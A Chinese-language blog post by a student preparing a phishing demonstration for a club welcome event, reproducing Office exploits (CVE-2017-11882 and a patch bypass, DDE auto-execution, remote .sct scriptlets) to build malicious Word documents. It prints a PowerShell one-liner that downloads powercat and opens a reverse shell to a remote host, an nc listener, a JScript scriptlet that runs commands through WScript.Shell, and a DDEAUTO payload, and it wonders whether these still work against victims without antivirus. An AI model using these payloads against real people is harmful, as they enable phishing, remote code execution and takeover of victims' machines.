新的一年迎新又开始啦,回想一年前这个时候的自己,算是有那么一丢丢的进步了吧。一年前的时候,貌似php都不会2333,浏览器的开发者工具都不晓得, 貌似就会搭一个wifi,hahah,扎心了,新的一年努力学习吧骚年!!! 这次迎新让同学们见识下钓鱼邮件是什么样子的,主要放的是word文档,也可以整理下office这两年爆出的漏洞,虽然说过不了360的吧,但是演示起来很酷的呀~
其实复现起来都很好说,github上都给了生成文件的脚本了 链接 首先为了实际钓鱼中应用,先弹个shell再说,找到了两种方式,一种是powershell 反弹一句话,另一种是直接写入shellcode运行,先看第一种 powershell一句话反弹shell
powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); powercat -c 1.1.1.1 -p 9999 -e cmd
然后利用脚本构造恶意文件
kali上nc监听端口等待连接 nc -lvp 9999
目标打开恶意word文档后 shell反弹回来
第二种方式先用msfvenom生成shellcode
然后利用脚本生成恶意word文档
目标打开文档后msf上线
不过后来考虑了下,同学们应该get不到上面操作的含义,所以直接来个简单直接的办法
python a.py -c "cmd.exe /c start ssText3d.scr /s" -o 1.doc
同学们打开恶意文档后就会出现如下文字
实现跳出文字的效果,这里要注意一下,先要修改calc.sct文件
<?XML version="1.0"?>
<scriptlet>
<registration
description="fjzmpcjvqp"
progid="fjzmpcjvqp"
version="1.00"
classid="{204774CF-D251-4F02-855B-2BE70585184B}"
remotable="true"
>
</registration>
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /c start ssText3d.scr /s");
]]>
</script>
</scriptlet>
然后利用脚本生成恶意文件
这个是远程下载文件calc.sct修改方式
没有尝试powershell一句话,应该可以的吧
这个是对CVE-2017-11882补丁的一个绕过 github脚本很详细了 链接
这个用不到office宏 复现很简单
改成DDEAUTO C:\\windows\\system32\\cmd.exe "/c start ssText3d.scr /s"
但是应用的时候要目标点击”是“才行
这个直接就有msf的脚本呀 放上链接 链接
but这些实际当中还能用嚒,可能会碰上没装杀软的吧hahaha.......